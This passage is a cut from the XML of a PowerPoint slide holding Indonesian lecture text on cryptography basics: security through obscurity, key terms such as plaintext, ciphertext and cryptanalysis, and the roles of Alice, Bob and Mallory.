              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketidakjelasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketidakjelasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuatu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyembunyikannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dianggap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setidaknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berisiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengetahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keberadaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pernah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengerti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memecahkannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Terminologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendiskusikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>- Plaintext (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cleartext)-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terenkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>- Ciphertext-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dienkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>- Algoritma-adalah proses yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengenkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendekripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>- Cryptanalysis-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memecahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendiskusikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karakter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendeskripsikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlibat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Karakter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>- Alice-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengirim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>- Bob-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dituju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>- Mallory-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jahat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencoba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menumbangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Terdapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>algoritma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjamin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sifat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerahasiaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disangkal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jenis-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
